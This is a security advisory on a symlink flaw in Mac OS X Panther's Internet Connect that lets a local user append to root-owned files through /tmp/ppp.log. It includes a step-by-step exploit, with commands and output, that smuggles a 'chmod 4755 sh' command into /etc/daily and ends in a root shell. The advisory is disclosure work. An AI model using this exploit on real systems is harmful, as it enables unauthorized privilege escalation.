|
|
|
|
| |
| The Internet Connect Application in Mac OS X is used to dial to the Internet. A vulnerability in Internet Connect allows a malicious user to write to any file in the system, thus gaining elevated privileges. |
| |
Credit:
The information has been provided by B-r00t.
|
| |
Vulnerable Systems:
* Panther 10.3.4 - Internet Connect version 1.3 (Possibly others)
The Internet Connect application creates a ppp.log file in /tmp/ directory. If the file already exists it is append to, otherwise a new file is created. It is possible to trick Internet Connect into appending data to any file in the system by creating a symbolic link file by the name /tmp/ppp.log and pointing to the file to be altered.
If the file /tmp/ppp.log already exists, the attack is not possible as the file is owned by user 'root' and group 'wheel'. However, due to the operating system clearing the /tmp directory during system startup and during regular maintenance, it becomes possible to form the attack as shown below:
First a file is created to represent a system file, owned and only write-able by user 'root'.
maki:~ # echo "TEST" > /etc/file_owned_by_root
maki:~ # ls -l /etc/file_owned_by_root
-rw-r--r-- 1 root wheel 5 25 Jul 00:09 /etc/file_owned_by_root
maki:~ # cat /etc/file_owned_by_root
TEST
A symbolic link is now created in the '/tmp' directory to point to the file to be altered. It is important to note that the link can be created as a non 'admin' or 'root' user.
maki:/tmp $ id
uid=502(br00t) gid=502(br00t) groups=502(br00t)
maki:/tmp $ ln -s /etc/file_owned_by_root ppp.log
maki:/tmp $ ls -l ./ppp.log
lrwxr-xr-x 1 root wheel 23 25 Jul 00:11 ./ppp.log@ -> /etc/file_owned_by_root
Now Internet Connect is opened. Under 'configuration' choose 'Other'. Enter some text into the 'Telephone Number' box (B-r00t r0x y3r w0rld!) and click 'Connect'.
'Cancel' can be clicked several seconds later.
Checking the original file '/etc/file_owned_by_root' we see the following:
maki:~ $ cat /etc/file_owned_by_root
TEST
Sun Jul 25 00:20:42 2004 : Version 2.0
Sun Jul 25 00:20:43 2004 : Dialing B-r00t r0x y3r w0rld!
Sun Jul 25 00:20:54 2004 : Terminating on signal 15.
Sun Jul 25 00:20:58 2004 : Serial link disconnected.
As can be seen, data has been appended to the 'protected' file.
Impact:
It is possible for a local user to escalate their privileges by appending data to specific system files. In addition, a malicious user may be able to render the machine unusable by corrupting important system files.
Exploit:
This demonstration appends commands to the '/etc/daily' file that is executed by default at 3:15AM each day. An alternative attack might involve appending to any of the files that are sourced at system start up such as '/etc/rc.common'. This latter method is convenient if the user is able to reboot the machine.
Create our link:
maki:~ $ ln -s /etc/daily /tmp/ppp.log
Open Internet Connect by Internal Modem -> Configuration -> Other
Internet Connect only allows certain characters to be used for the telephone number. The background '&' character allows our command string to execute even though they are prefixed by text we cannot control.
Under the Telephone Number field enter:
& cd .. && cd .. && cd .. && cd .. && cd bin && chmod 4755 sh &
Click 'Connect' ... and wait (10secs) ... press 'Cancel'
If we check the content of the '/etc/daily' file:
maki:~ $ tail /etc/daily
if [ -f /etc/security ]; then
echo ""
echo "Running security:"
sh /etc/security 2>&1 | sendmail root
fi
Sun Jul 25 03:10:11 2004 : Version 2.0
Sun Jul 25 03:10:11 2004 : Dialing & cd .. && cd .. && cd .. && cd ..
&& cd bin && chmod 4755 sh &
Sun Jul 25 03:10:15 2004 : Terminating on signal 15.
Sun Jul 25 03:10:17 2004 : Serial link disconnected.
All we need to do now is sit back and wait for cron to execute '/etc/daily'.
maki:~ $ date
Sun Jul 25 03:13:43 CEST 2004
maki:~ $ cd /bin
maki:/bin $ ls -l sh
-r-xr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*
maki:/bin $ date
Sun Jul 25 03:15:50 CEST 2004
maki:/bin $ ls -l sh
-rwsr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*
maki:/bin $ sh
maki:/bin # id
uid=502(br00t) euid=0(root) gid=502(br00t) groups=502(br00t)
All that is left to do is clean up '/etc/daily' and remove the link '/tmp/ppp.log'.
|
|
|
|
|
|
|
|
|
|
